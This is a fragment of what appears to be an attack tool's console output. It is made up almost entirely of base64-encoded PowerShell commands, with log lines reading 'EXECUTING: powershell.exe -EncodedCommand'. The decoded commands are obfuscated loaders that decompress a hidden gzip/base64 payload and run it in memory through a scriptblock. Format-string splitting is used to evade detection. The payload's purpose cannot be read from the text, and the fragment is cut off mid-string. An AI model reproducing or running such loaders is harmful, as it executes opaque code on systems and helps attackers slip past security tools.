ADkAbgBXAGUASgB6ACsAQgBvAGUAVQBwADcATgBxAC8AQQA1AGYAUwBTAHoANwB1AHoAVQBPAHUAZQBKAGYAQgBUADAATQA3ADAALwBNAGYANABEAHYARAA3AEIAawAyAHYAYgAxAGMATwBlADEAOQBTAHYAYQB6ADUARQBCAHkAVABkADkAOABJAGMATQAwAFAAMwBkAFoAawBYAFQAMwBWADgAegBiADAAcgA4AHEATgB6AGgAOAB3AFgAWABlAHQASQA2ADkANABSAE8AcgBSAHQAMwByADgARwBOADIAdgA4AGMATgA4AEYATgArAGEAYgB6AEgAaQAyAGoAcwA4AFMANwBwAGcAMwA0AEcAWAAxADMAUwAxADkAVgAnACsAJwB2AG4AcgArAC8ANgBEACsAQgBVADkAdQBlAGYAYwBNAFgAVQArAGcAZwBmAFUAWAAzAFQALwBGAC8AaAB2AGEARgAxAHEAZgBIADgAbgBUAGcAUAByADYASAAzAFMAZwBTAGsAUABUADkAVABmAGgATAA2AHQAYwA5AGYAdwBaAHQAZAA5AHgALwBFAGQATwBrAC8AVwBGADYANAB6ADQAZQA4AEYAKwA0ADkAOQBZAE8AbgA4AEYAdAB6ADMAcwA2ADYAJwArACcAbgBIAEYAdwB0AHEANQByAC8AQQAxADEAaABmAGYAbwBMAG4ASwB6AHkAcABFADkAVwAyAEsARgA3AGkAeQByAGwAVgBUAHIAaQB7ADEAfQAvAGQAdgBYAEwAZgAwAGIAZQBvAHQAbwA3ACsALwBFAFIALwB4AFMAZABQADYAZwBuADcAYwB4AG4ALwAxAFQALwBrACcAKwAnADUAewAyAH0AaQBkAG4AUgA1ADIAVgBnACsAdQAvAGkAZQBNAE0AUABMAFcAdABZADYALwByAHUAQgBYAFcAbABmAEQATwBrAGEAOQBWAEYANAByAHoARAArAHQAbwA3AHkASAAyADYASwBVAHoAOQAyAEgAMABtAGYAbABQAHUATgBmADMAaABZAE8ALwBYAFgAZgBFAFcAMwBXADQAWgBJADcASgA0AEIAUAAxADEANwBiAG4AbgBXAC8ANABOADQAZQAnACsAJwBuAHEAYgBzAHEANgBaAEgAWgB7ADEAfQBUAGUAbgB1AHYAbgBEAGMAeQBkADUAdABVADcAQgBmAC8AUABxAHEALwBVAGgAZgBtAFgAZQBUACsAVAA0AE4AeQB7ADIAfQArAGIAZQAnACsAJwB1AHsAMgB9AFcAKwA1AGIARQBoAGYAaABmAHcAYQBlADAAaAB4AG4ASABoAGEAZgB2AEIAawB2ADgATAAzAGkAdgB3AEUAdgBiAGMAOQBSAHQAKwBSAC8AUwB2ADIAMwBEADQAawBQAE8AcAA2AFgAcgBZAE0AbQByAHYATQBCACsAWABvAG0AdgAwAGUAZQBWAFoAegA3ADEAZwBIAFcAYwBYAHQAMABoAFAAdgBIAEcASgAyAFoAbQBSAGUALwBrAEkAOABWAGMAYwB1ADgATgA3AHEAdAA1ADAAVABqADEAWABZAHcATgAxAG0AbgBEAEoASgBlADYASABqAE8ALwBrAHgAOQBUAGEAeQBiADAARQBmAHsAMQB9AHEALwB5ADIALwB1AHEAdwBaADgAQQArADYANgBYAFgAZQBvADYAdQBUAG4AVgAzAGYAQgBVAGUAdABzAHgANQBTAGYAOABZADcAegB2AHkASwBEAHUAVwA1AGEAbAAvAFAAaABEAEgAcQBlAGYANwB6AFUAawB2AEwAMgBzAGQATQAzAE4AZAAxAHoAcQBuAFkANQAxADgAagBsADAARgBjAHkAcgA0AEwAaABPAGYASwA4ADQASAA0AHIASQBBAC8AKwBvAG4AcQB6AEwAbABaAHsAMgB9ADQAKwAyAHQANwBuAE4ATQBsAC8AMwAzADUAdQB3AE8ATgBmADQASABHAEwAbgBrADgANAB6AFkAbgBMAEEAbgAzAFUAOABwAHoAdwBqAGYAdgA3ADgASQA3AGkATgBLAGMAKwA1AFAAYwBTAG4ATQBMAFQAZQBjAHIAcgBCAEYANAAvADYAaQAvAGQAbgAyAFAAbgBsAFgAWABlAEEAVAB1AFcAZQBlAHEAYgBSADcAOQBXAHIAaAB2AGoASgAwAC8ANgBTAGoAagBXACcAKwAnADgAeQB2ADAAbgB1AEkANQBwAGoAKwBKAHoANABmAGcAUAArADAAVABWAHIAeQAvAFoAQgArAGkAUABwAGUANwByADUAawBmAEoAdABiAFQAOQBQAEUATwB1AEUAOQA5AHsAMgB9ADMAMgByAGUAYgBLAG4AVgBlAHUAbQBOAE4AZQBsAFAARABFAGYAewAxAH0AMABmAHUAUAB4ADMAcgBpACcAKwAnAFUAYgBkADEAOABiAGcAUgBIAEUAYwBjADkAKwB1ADEAaAArAEoAegB4AGIAcwBrADYAcQBQAGUANAB7ADIAfQBoAGUAawBhAHYAdQBmAG4AYgArADUANgBSAGQAWgA3ADEAVgBvAC8AKwA4AHAAawA2ADIATQBKAFAANAB1AHMAKwB2AEUATABlADQAMABOAGYAbwBpADQAcQArAGEARwA2AG4AVQBYAFMAdQBZAFgAMwBaAG8ANwBQAEgARABzAG0AMwB1AGQAJwArACcAWgByADUAdwA1AG4AcABIAG0AZwBIAG0AdAAwADEAWgBsADQAcwBkADEASgBOADIAegBKAHUALwAwAFIAZgBPAEEAegA4AHUAeABiADgAdAA4AEQAMgA2AEkAaAArADcAYgBNAFAALwBTAFAANgB6AGIAQQByAHMAYQA1AE8AUABHAGUAMQBIADIARgBIAHIAdABPAEoAOQBOADkAKwA5AGEAVgA4ADEAZABCADkAWQBkAHgANwA2ADMAdAB6ADcAMQBIAEYASwBpAGEAegA5AFQAOQAyAFAANgBoAC8AZABXADgATABMAG4ATQBPACcAKwAnAC8AegBwAHYAQQBqAGUAYgBWAHUAewAxAH0AdQBLADMAdwAnACsAJwBCAC8AdgBLAGQAaQBQAFIAZAByAEQARABNAEcAcAA0AHUAUABQADIAWQA5AFMAUgAyADMAdgAxADgANwBCAC8AZAB4AHoAUwBCAHsAMQB9AG4ARQBlAC8AMwA2AFoAZgAwAGYAZQBxAHcANQBUAGcATgA3AHsAMQB9AGQAeABhAEgAawB1AE8AYgBjAHUAOQAvACsARABEADMAaABNADkAYgBUAEYAVAB1AEwAcgArAFQAYgBIAG4AdwBQAFAAVABUADEAMwBsAHYAeAAvAFMAegA2AG0AbgBtAE8AcQA1AEoAZgBPAEwAOQBqAGoANgBkAFgANABiAFgAdgB2AFYATQBHAC8AaABmAHQAagBqAGMATwBrAEYAKwB0ADQAZwBTAGYAegBYAGIALwBlADQAMQB4AGIAZAA3AFAASAArAGoAewAxAH0AMwBMAE4AZwBYAHAAUAAyAHUAZABkAGkAaQBTAHYAdQB1AE4AWABQAHsAMQB9ADEAVwBQAHEAbwB4ADMAcgA1AHsAMQB9AGYAMABvAHUAeAArAFQAcwArAEgAOQAwAGMAcgA5AGcAZgBvAFAAZgBEAFkASwBkAFAAZQBWAFgAaABjADAALwAvAFYAdAA1AGIAcwBBADQANAA4AHAAWABQAFYARAAwAGIANABQADcAQQArAHkATwBnAGoARgAvAHoAZgByADkATAArAFUAKwBmAGQANABPAGUARQB2AFYAcQByAGwAMwBEAGIANwBpAFUAOQAzAEgAWABmAHYARABmAGUAMwBWAGYAWQBiADYASQBIAG8AdAAnACsAJwA3AHoANQBlAHsAMQB9ADQAcwBOADMARwBxAGUAZQBzAFMAMwBTACcAKwAnAFUANwBKAC8AQgArADIAbABmAFUAdgBEAGMATABNADAAUABjAFYARwAvAFcAcwBmADMAZgBjADkAeAB2ADEARwB7ADEAfQB4ADgALwAxADMAbgB7ADEAfQBPAEgAWgBNAHkANwBhAFUASwA4AHMAbgBuAGUAZABvAEQARABTAFAAcABxAFcAMgBaAGQATQBHAGsALwBJAEIAYgB4AFcAbABJAFAANABmAFgAZwB2ADUAaAAvAFcAZQArADIAdABSADcAdAAyAE8AZgBXAFkATQBIADgAJwArACcAZQB7ADIAfQBtAGsAcgA2AFoAZQB7ADIAfQA1ADEAZgBYADIAeAA3AGkATgAvAEwAZQArADEAOQA2AG0AdgBFAGYAYwBHAGUARAA3ACsAZgBuAEQARgA5ADUAWQArAHYANQBmADIAaQB0ADAAcwB6AGIAMQBwAGoAcwB2AHEAZQBTAE8AMwBIAGsAUABmAHQAagAyADMAbgB7ADEAfQBXADcAMAA3ADAAcgA5AGcAWgBwAFgAOQBkAGoAagBwAHAAVwBxAGEAOAB1ADYANwBrAHcAcAA1ACsAdwBsAC8AewAxAH0AOABVAHIARAAvADgAagB5ADQAWQAzADYAewAyAH0AZgBhAHEASABYACsAWQByACsAbwBWAHcAUAA2AFcAdQBzAHYAZQA1AFkAMgBCAGMAZQBYACsAYwAyAFQALwB2AEYAYgB3AG4AdgAvAE0AZQBwAEUAcAB6ADcAOQB3ADQAcQBwAGgAcgBQAHQAYwA2ADQATAB0ADEAdgAvAGsAOQBnAHkAOABYADkASQAyAGwANQA5AEUARAAvAE4ATwAwAFQAaQB2AFQAZgBuAEoASABuAGMAaQBmAEUAWABZAG0AMwBXAGQAOQBlAFYATwBsACsAZABGADcASgBmAGEASAA1AGcAZgBtAEEALwBVAHIAZgBUADUAaQB6ADkAMwBhAHAAMwAxACcAKwAnAGcAMQAzAHYAOQBaACsAdABCADUAcgBkAFQAMwB5ADMAaABoAGEAWABuAGEAZgBaAHYAbgB0ACsAWQBXADgAMABMAGYAZQBPAHEAUwB2AHUAdgBPAGYAWQBwAEQANQBNADgANgBZAGEAYwBQAHQAeABaAHAASAAxAGUAbABpAGMAOQBrAFgAVABWAEwAYgB3AHoANABOADYAVQBSAC8ATgBvAHoAdAB3AGgAWABJACsAOQBQADcARQArAHEAcgBoAC8AewAxAH0AeQAvAEkANwBxAEgAbgArAG8AJwArACcAcQA2AE8AcQB2ADEAegB3AFcAZgA1AC8AJwArACcAUwBaAGwAdgBGAHoAegA3AGsAVAB4ADIASAAnACsAJwBEAHYAZgB1ADYATAAxAHoAVgArAFIANQB4AHoAcwBKADUALwBGAHIAcgBsAEEAdwArAEcAWgBsAG4AJwArACcAMABWAG4AVQB1AGYAdABhAGkAWgA0ADgANABKAGYANwBuAHUASwAvAGMALwAzAEEAYgAvAFQAUABmAGQATABKAEwAYwA5AHoASAArAFkAVwA4ADgAdgBGAGUAOQA5ADAAdgBmAFoAcgBPADYANAA5AFYAMQBCAC8AMQBNAHYANwAvAHYAWQBuAHYASABXAHMAagB6AEYANwBVAE8AVgBqADYAVABtAHcAawBmAFkAagA3AE8AMQBMADYAagBuAHEATwBVAEQANABjAGYAMAB6AHAAegBPAHYARABkAGoAcgB2AFkARwByAGcAcgAwAGQAKwBLAC8AJwArACcANQBZAGMAYgBuADQAdABPAEYANgA2AEUAQQBMADMAMwBiAGoAYQA1AHIAKwBmAGUATQBTADMAaQBzAGUATgA5AEQAWABOAGIAegA3AFkAagA3AFYAcABIAG0AaABLAEYAMQBxAE8AYwA5ADkANQBzAFoAKwBqAEgAdAAnACsAJwBnAFkAYgAwAHMAeAB2ADIAZgBFAG4AUABuAE4AWAA3AFkATgBmADUAMABuAHoAbgAzADgATQBlAC8AYgB2AEwAdQAxADUANwBOAG4ANgA5ADMALwBoAEsAUAAvAGwAJwArACcAaQAvAHEAMABTAHoAMwA3AFkATwA0ADIAdwBjADEAYwBtAGUAdwBmAE0AMgBlAGEANQA4AFAANQB4ADYAZAArAHIAdgBtAEwALwBjADkAMABQAEgAdgBCAHYAeQB2AG4AcQAvACsAdAA2AEQAKwBuADUAdQArAFYANgBNAGoAOAB0AFAAVAArAFkARAArAGUAdQBmACsAcwBYAHgAKwBPAFkARgArADgAaABwADIAWABhAFMANgBrAHUALwB2AGIAdgBoAHQANgByAEYAaAA5ADAAWgArAEsAcgBwAE0ATQBXAHkAWAAvAFoATQAzAE0AZgA4AG4ATwAvAHYASAA5AGcAUABtAEYALwBWAHYAZgBMAEQAZgB2AG8AegBQAHUAUgBhAFoAcABqAHMAZABQADcAcwBSAG4AeABHADUAcgAvAHMAdABQAHoAdQArAE0AYwA3AEQAMgAzAGYANwArADgASQBzACsAcgBQAE0AMAB2AGMALwA5AHUAYQBaADMAWABzAE4ANgBKAHQAUAAvADEAbgBrAGQANQBXAGIAdgBlAFgAZgArAEgAdABKAGQASgBPAG4AbgB6AFAAcQBkADgAcwBkADQARgAnACsAJwB2ADIAMwB6ACsAZAB2ADcAbgBpAHMARABiADkANgB2ACsAMwBlAGgARgBQAGMANwB4ADcATgBNAHYAMAAvAE8AMABmAEUAdAA2AC8AOQByADYAbgA1AEgAWAAnACsAJwBYAGEATABOAE4ALwB5AE8AMwBPAGUANQB1AEkAdAAvACcAKwAnAE4AYwB1ADAAdQA5AHAAcgBkADUAcABuAGoAagA2AE8AZgBXACsAMgBIAHgAOQBqAE8AOQBGAC8AWAB2AEYAaABmAG0AMQBmAG0ANwBFAFAATgBGAGQAcABQADEAUwArAGoAMQBwADcANwBrAHsAMQB9AHYALwBoAGQAaQByAG4ATgA5AGEAaQA4AE0ANQBmAFYAKwB2AC8ARABQAGQAWQB4AGcAMQBxAGYAYgBQAEwAVABmAGIAZQAxAC8AJwArACcAcgA0AEQAVAA1AC8AKwA5AFkAOQBQAHgAZQBQAHUANABkAFAALwAvAEIAYwB1AHkAUgBwAFkAZwBSACcAKwAnADgAQQBBAEEAewAwAH0AewAwAH0AJwArACcAJwApAC0AZgAnAD0AJwAsACcAQwAnACwAJwBRACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] - Bytes remaining: 6136 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQB7ADEAfQBPAGIAawBJAFcAawBDAHsAMQB9ADQAVwBZAFMAWABQAGIAUwBCAEsARgAvADgAcgBjAFAAQgBQAFIAQgAyAHAAegBhAHoAcQBpAEQAdwBrAFIAWABDAHkAUgBkAEgARgBUAGsAeABOAHoANABEAGEAdwBUAFMAMQB1AHkAUgBZAGsALwAnACsAJwBmAHAANQAzAHkAdABRADYAagBrAE4ATAB3AHsAMgB9AFEAUQBGAFUAdQBMADEAKwArAHIASAArAFYAZAAwADkAZgBIACsANwB2AGIAbgBkADMAUAAvADcAOQAyADIAKwBUADMAWQArAC8ALwBEAEYAZgBQAFgAeABkAHIAVwA5ADIAZgAvAC8AUQAwAHUALwA0AHkAKwBSAFQASwBoACsAdQA3AHoANwA4ADgAbQBGAGUARgB5AC8AUgBYAHMAUwB7ADIAfQBqAHAAZQA0AGUASQB4AGgAVgBYAHkAUAA5AGkAQwBHAGQAZABHAE4AZABoAFgAegBLAGsANgBpAE0ANAB7ADIAfQBaADEANwBLAE8AcQAxAHIAUAB5ADQAcgAnACsAJwAzAEwAcgBtAC8AcgBJAHQATwBkAEIAZAA2AFAANQA2AGkAMwBNAGMAbQBpAG8ALwBSADAAZgBNAG8AZgBrAGIAbgBQAHEAWgBKAC8ANwBjAGoAdABoAEcAdgBVAFoAWgA2AFgALwB0ADAAWgA2AHgAegBGAGIAMQBGAGoAJwArACcASwBOADQAagBIAEkAVwBxADYAcABvAHMAZQA2ADYASwBwADUANAB2AGsAegBGAE0AWABaAHQAVwBlAGYAaQBuAFAAVgBtADAAZQB2AEgATwBoAFcAbAByADMAVgB4AEcAOQAwAFUAJwArACcAcwA5AEIANwBzAGwAdgByAGYARwBaADkAMwBaADkARQA5AHoAUgBHAHEAWABqAHsAMgB9AC8AeQAzAHYAeQBZADcAcgBLAEgANQB3AHIALwA4ADcAVQBaADYAeQAvAHQAZgBvADMAYwBlAG0AaQBqAHIAYQBaAGMAeQBqAFcARwBEADMAQwBEAHYAeABKAHgAVQBwAHUAbABxADMASwBrADYAagA0AC8AdQBQADAAZQAzAEgAcAB6AHEAMAA3AGsAYgB4AEsAbAA3AGYALwBPADcATgBRAG4ASAA4AHsAMgB9AHQAMgBIADUAOQBkADgAcgAvAFcAMQBqACsASgB5AEgAcwBzAG8AeAB0AEYATwArAEYAMgB5AGoAcQA3AFAAeABHAFUAVgBzAHEATwA5ADEALwBNADQAeQAzAEcASQBvADIAagAzAFkANQBJAFUAZgA2ADAAdgBlACcAKwAnAHcAZgBFAGEAWgB2AHcAWAAvAEUASgByAGEALwA5AGQAaABHAE8AbAArAHgAbwA4AFoANgArAFAAeQBGAHYAbQA2AHEAWQBSAEMAZgB4AC8ARABtADYARgBmADgAZgBSAFcAOQB7ADEAfQB2AHUANgBpAHQANQBjAGYAcgBEACsASQB1AGYAMwBaAHgASQA2ADgAZABrAHYAaQBxAFgAagBMAHIANABoAFQANAByAGUAeABYADMAMwB5AE0AbwB4AHUAQwB6AHgAYwBFAHAAOQBGAHAAWAB3AG8ANwBwAHMARQBIAHMAcABZAFYAcwBXAGMAZABSAGQAMQB6AHAALwAyAFMAZABFAEoANQBiADMANABrADMAMwAwAGYATQB4ADYAdQB5AHIAagBZAGwAewAxAH0AcABIADQAcgBEAHMAcABKADkAdgBaAEoAOABmADgAegA3AHkASAAvAEYAZQA4ADMAMwAzAFoAcAA4ADcAcQBQAFQAeAB6AC8AbgBYADMAWgBjAFIAMgAnACsAJwA4AFQAVQAvAHgAWABQAHIAVAB1ACcAKwAnAEMAZQB1AE4AaQBSAHMANAB4AFgALwA4AHEALwBIAFgAZABtAG0ALwBFAHYAOQBmAHkATABmACcAKwAnAHcAOAAwAHoAYwAnACsAJwBkAHkARgA3ADkAZAAyAHkAVgByADYANwArADUAagBXAHgAYQAvAGsALwB6ADkASgBkAGEARAB2AFIAdABpAHQAZQBHADUAcQA0AGEAVQBYAGsAYwBpAGoAOABpAFIALwBuADQAbgAvAHEAcwBHAGwALwBIAHsAMgB9AEYALwA4AEwAYgBDAC8AYgBOAHEAKwBJAFAAdgBzAC8AcgA5AFYAbQB2AGgAVgAyAHIATwB1ADcAewAxAH0AMwBhAGMANgB4ADgATgA0AEUAeAA0AFAATwBEAEYAKwB5AHgAUQBEADgAbAB3AHUAbABCAGYAcQA2AEoAVAAxAHoAMgB3AC8AKwBDAHQAYgBNAFEAWQBQAGkAdQA4AE8ASABNAGkAKwBMAFgARQBVAHYAaQBiAEcANwA1ADUAOABDACcAKwAnADQALwAzAGsAYgBCAEwAOQB7ADIAfQBuAHYAZgAvAHIAOQBTAG4AVQBtACsAeQBjADEAZQBhADMAewAxAH0AMABYAGYAeQB1AGEAUwBlAGwASABmAGgATAA0AEUAUAArAFgAWABEADgANQAzADMAVgBkADUAUwB5AEsANQBIAC8AagAvAGkAZgBwAFMASQA4ADQAQgA2AHYAeQBVAE8AeQBwAC8AegBJAEYAeAA4AGIATwBvAHcAMQA2AFgAegBwADMAegB4AFgAdABuAFAAOQBoAEgAdgBTAHYASABzAGUAUAA4AGgAKwBaADgAWQB4AHcAdgAnACsAJwBaAFIAYgB6AFAAaQBjAHMAcABjAFoAcABVADgARgBFAGkAcgA4AGEAcAA0AHYAQwBGAGUATwA2AEkAZgAzAGMAUQAxADkANQAzAGsATwB1AHsAMgB9AHYASQBjAFAAQwB2AEsAawBlAG4AbwBpAFQAcwBwAC8AaQAzAHsAMgB9AE0AUQB2AEYAcwB7ADIAfQAzAGYAcQBkAHsAMQB9AFoAdQBUAHMARwA3AG4AcAArAFIAOQB3AGwAOABJAEoAdwBtADYAaQBYAHoAegBvADIALwA0ADcAbgBzAGwASgA4AFAAMQBJAFAAaQAvAFIAeQBkAEQAYgB4AHcAUgBMAHcAdgAzAC8ATQA1AEIAZABmAHkAMwAvAHcAeABKAEkALwBLAGQAMgBJAC8AWABhAGYAVQBkAFIAZQBjAEUAOQBkAEUAUABUACsAeQAzAHMAWgAxADYAWAAnACsAJwAyAGMAcgB4AG4AMQBLAEYAeQB2AEsAOQAxAHIALwArAFQAOAB0ADMASgA5AHkAUwAvADUAYgA5ADQANwA0AEUAWAA0AFAATwAnACsAJwBDAHIARAB3ADcAMABmAHsAMgB9AHYALwBkAHQAUQBCAGUAWQBMAEgAOQBOADIAMQArAGEAUQBHAE4AdwBQADIAWABZAE4AYgB2AFQAZQB1AFYAewAxAH0ALwBhAFoAMgBSAGUAaABpAGYAewAyAH0AeAB3AFIAUAA3AGYARgBqAFUATwBsAC8AeAAwAFgANwB0AFYAbQBIAHUAaQBGAHUAOABPAGsANQBlAGYANABXAHYAVQBSAGMAbgA0AGoARABFAHYANwB1AHUAVQA1AHYAMgBGAGQAeAArADkAcgBVADcAdwBuADUASABYAHEALwBHAGYARwB0AHkAWgA5ADQAWgB7ADIAfQA4ACsAcAA4AFIASgBlAEwAOABrAFgANAByAHIAbABIADcAVABxADUAcAAxAEYAdgBEADIAaABMAHsAMgB9AHAAcgBuADEAdwBlAHYAQgBmADkAVgB3ADMAZABUAHIARwBIAHUAOABuAE8AMQBiAFUAdgArAEkAMgBJAGgANgB5AFgAOQA5AGQATwBEADkAVgBjAGMALwA2AHcAeQByAHoAOQA0AHsAMQB9ADgAeQBjADQAaAA2ADQARwBMAEYATwA0AFQARwAvAE4AUABZAHYALwB2AFgARgBmAHsAMgB9AFUAZgBoAFMAUAA1AHMAYQBCADUAWABzAFUATgB6AGsALwA3AFgAcgBrAC8AegBJAEgAKwBGADEAMwAvAGoALwB6AEgAVQBJAFgAcwBUAFAAeQBzAE0AcAA2ADQAJwArACcAeQBwAFUAKwBWAHAAVwBxAHUAZQBaAE4AZQBNAGYAcQB2ADgAJwArACcAcgAxADAAMwA4AEMAWgAxAGMASQArADkAbgA4AEMAZAArAHMAJwArACcAWQBaACsAMgB5AEkAbAArADQAVABQAEsAZgB2ADEAKwBCAFUALwA0AC8AeAA4ADgATAAxAE4AUwBNAHYAcwB1AGMANwBPAEIAcgBXAEcAVAA4AEwAKwBFAEoAKwBEAFkAeQByAEIAYwAvAE4AaAB4AFAAMwBzAFEAQwBQACcAKwAnAHcAdgBNAE0AWABDAFcAZQB6AC8ARgBMADcAOAAvAG8AJwArACcAbgA3AHgAUAAvAG8AVQB2ADgAYwBzAFIAOABaACcAKwAnAHIAewAxAH0AewAxAH0AOABKAG4AbwBpACsAcAAzAHEAKwBjAHYANQBUADcAUwB0AGQANgA0AHsAMQB9AC8AagBzAEgAcQByAGkAKwAvAHcAMQBwAGEAOABpADEAZABVADcANgB2ADgAdgB2AEkAcQB1ADYALwBlACsAZgBHAFkAZQBLAGwATwBhAHYAWgBYAG4ANwA4AGoAWAArAEwANQBQADUAdQA2AHYALwBQAC8ATgBYADAAdAA2AE0AOQA3AHIAbQB2ADYAagAvAEMAMABwAEoANAA3ADEAewAyAH0AZABqADUANQBNACsASQA3AHgAdgBXAEYAYwA0AGMAWgAzADIAWgBwAG0AZgB0AGMAOABNADMARwBUAGQAYwBlAEQANwBPAFgAMQBaADkAWAByAGYANgBKAFUARgAvAGkAaABPAHgALwBDAFcANAAnACsAJwB2AGkAewAxAH0AUABRAFAAegBFAC8AVwByAHUAaABVAE8AaAByAGIAYgArAFAAMABFAGIANgB5AE0ASQAvAE8ANgA4AFMANgBlAGUASQBJADMARgAvAEIAcABDAFUAKwBqAGUAOAB7ADEAfQBUAGQAbQAvAHsAMgB9ADIAdwA3ADcAWABkACcAKwAnAEgAWABkAEIAJwArACcAWAAvAFgAUgB1AHYAJwArACcANABGAEQAOQBkAHsAMQB9AFAAZgB5AHIANABkADcAeQB0ACsAdQA1AHEAKwAwADYASQArADcAcAByADQAZABjAEMATAA3AEQAcgBGAFgAKwBWAHoAUQBEADAASgBaAHkAWAB4AFcASQBGAEwAMwBZAHMAUABqAG8AbQBqADgAcgB7ADIAfQB7ADIAfQBMAHoAdAAwAEYAKwAnACsAJwB1AHsAMgB9AHAANABTAGIASwAzAGgATAB1AEQAQgB1AHcASgBkADUATQB4AEgASAB7ADEAfQA2ADcAYwA1ADEAUgBuAEYALwBTAEYAegBEAHUATwAyAHkAZgB3AGMAJwArACcAMgBYACsAdQA4AGYAZgBRADEAeABhAFQAVgA4AC8ANABHAEIASgBQAFIANwAyAFgAYwBJAGIAVwB0AGUAOABMAGwAeQB0AFgARwBjAEwAKwB2AEMAeAA5AFkAYgB6AFcAZQBGAG4AaQAzAFgARgBXAHoALwB4AGMANABGAE8AeQBMAHIAegBLAC8AWgBJAFoAeAB4AFoAcAB6AGwAdgA5ADEAdwBYADQARgBQADkALwA3AEQAdgBNAGYAaABTAEgAWgAxAG0ASABaAGoAMQB6AGMAegA2ADAAMwAzADYAMQBMAHcAYgB1AFUANgBHADEARgBuAGIALwByAHkAUQByAHkAdQB2ADMANgBkAE8AcgA2ADEATAB5AEYAUABYACsALwA0AGsAcgAzAFAAMABiAGUANgBMAGwAKwBSAGIAdgBIAG0AZAA5ADgAMwA4AE4ASQBaAEgAZQB1ADQAdgA1AHQAMQB0AGsAbAAvAGsAbwA4AHAAOABMAFgALwBNAFQAOAByAHoATgAnACsAJwAvAGYAOQBPAHQAZQBWADgAVQBuAC8AbwAwACsAcgBmAHEAYgBVAFkAYwA4ADYAcAB7ADEAfQB2AGYAagB0AGgASAA5AGkAKwBzADEALwByAEUAcQBlAFoAKwB7ADIAfQBGACsASwBoAC8AVgBjAG0AMwByAE8AYwBiAFMAZQBVAFAAeABjAHgANAByAGYARgBQAHMAVQByAHcAbAA4ADMAYQBaAGYAbwBPAE4AcgA4AEQAQgB5AEgATgBEAEwAdQB1AGIAKwBUAG4AOQBRAGYAdAAvADAAUwBJAEsAdgBYAHMASAA1AEMAUAB5AFUANgBHAFQANgByAHUAMQA2AGEAWABqAC8AagB2AFcATgBKAC8AdwBuAGoAcgAxAEgANgB2AGkAZgA0AEcAWQBFADcAcABXAFAANQBYAHUAZQBEAG4AagA2AHsAMQB9AGIANABXADgARQBYAEcAOAB4AGYAegBiAEoAWABqAHQAMwBOAGYAcQB2AEIAagBoAHQAMwBLADEAdwBYADcAWABEAEkALwBIAE8AcQA4AEUAMwBsAHUAawBIADQAZQB7ADIAfQBPAE4ATwBhAHUAWQBCADkAYQB2AG0AWAByAHgALwB4AGIANABMADkANwBYAC8ANABhAHYAUABmADgAMwBmAG8AcwA1ADgAcwBVAFkASAA5AE8ARABSADQAcQB6AFIATAB6AC8AQgB4AGQAeAA5AHcAdQAvAHQANgBRADkAYgB6AHcAbQB6AFAAUABkAGsALwBUAEkAagBUAHAAawB2AEgAYQBlAFgAWABFAGYAawBFAHoAdgB7ADIAfQBDAC8AUwBHAC8ASgBVAGYAWABsADkAMQB2AFEATwB2AFgAQwB2AHEAeABQAGkAZABzAHQANgAwAGsAbgAzAFcANgBlAG8ARABCADMAKwBWAEQANgAxAHIAMwBsAHEAaABaAC8AVwBkADUANwBjAGMAdgB3AGYAMgBXAFYAbwB2AG0AaQAvAHUANABMAFYAdAB3ADYAdQBlAGgAOQBEAFoAQwBYADEAVwBTADAAOQBsADMASABqAE8AVQBMADEAdQBqAFYALwAwAGEATwBSADUAdwBQAFgAcgB2AEoANQA0AFQAdQBHADUANgBuAHgAdABYAFYAegAnACsAJwBDAGkAegBYAHIAYQA5ACsAUgBlAFEAegA5AGQAdQBHADgAWAA1AEsAMwBaAFcAUwBlAFgANQB0AGYAdwBTAFAANgBvAGsASgBQADMATwBiAG4AeABDAFcASQBvAC8AbAAnACsAJwAzAGwASABLAGYAbgBOAFMANQByADYANwBSAGoALwBKAHYANwBMAHEANwBKADQAOQBmAHEAZgBlAFoAYwBUAGwARABKAHoAMABRAGoAMgB2ADYAaQBOADcAYgBOAHYAVwBsAC8AVAB2AFcAQgBlAGEAbAAvAFIAdQBQAEsAaQA0AG4AUABNADkANQBiAHUAWQBSAHgAVwBPAEkAJwArACcAZgBzAHgAMQBjAGMATgAzAFYANQA2AEgAbgBaAGMARgB1AGkAbwAxAC8AaQBiAFgAYgBTAHYAUABPAGEANABYADQAUgAwAGQAbABOAHsAMQB9AHIAcAA3AG4AdgA1AGoAbQBzAE4AdAA5AFgANABrAHYANQBaAFQAMwBhAHQAYwA1AHgAZgAwAG0AMgBHADEAeQBEAFIALwBWAHQAZQBNAEoAegBHADMAagByAG8AMwBPAFAAYwAxADcAcABwADUANQAzAHoAUAB0AFgANgBDAE8AdABQADgATgBPADUAewAyAH0AdgB3AFUAYgBvAE8ANwArAHsAMQB9AEwANgA1AEQATwBJAE8AdABjAHIAYgB0AHkAWAAyAEkATwAxADMAdQA2AG4AOABNAFgAMQBHAFYAUwBYAGUAcgAvAGwAZgBzAEUAOAAyADIAZQAwAHkAZgBwACcAKwAnAGIAYgA0ADgAOAAvAHoAdAB1AFQAWQBSAG4ANQAvAEcAVgBVAGkALwAwAC8ALwBRAFEAZgBRAGgANgAxAGIAMABzAGUAcQByADYAMwBoAGUARQB4AGYAWgBkAGEAagB2AGUALwBLADQAWQBhADQAUQBMAHkAKwBaAGsAegBxAGUASQA2AHgAYgBsAHUAbQB0AHIAcAA3AGgANgBUAEgANQA3AHoASQBuAE4ALwB